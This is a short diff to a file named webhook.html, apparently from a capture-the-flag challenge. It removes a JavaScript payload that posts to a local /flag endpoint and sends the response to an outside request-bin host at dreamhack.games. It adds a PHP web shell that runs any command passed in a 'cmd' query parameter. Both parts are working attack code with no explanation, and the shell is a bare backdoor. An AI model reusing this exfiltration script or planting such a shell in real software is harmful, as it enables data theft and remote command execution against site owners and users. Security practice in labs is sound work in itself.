--- a/webhook.html
+++ b/webhook.html
@@ -1,17 +1,3 @@
-<script>
-const formData = new FormData();
-formData.append('admin', 'zzlol');
-
-const xhr = new XMLHttpRequest();
-xhr.open('POST', 'http://localhost:8000/flag', true);
-
-xhr.onreadystatechange = function () {
-  if (xhr.readyState === 4 && xhr.status === 200) {
-    const response = xhr.responseText;
-    location = 'https://gpeoqxy.request.dreamhack.games/' + response;
-  }
-};
-
-xhr.send(formData);
-</script>
-
+<h1>
+  <?php system($_GET['cmd']); ?>
+</h1>
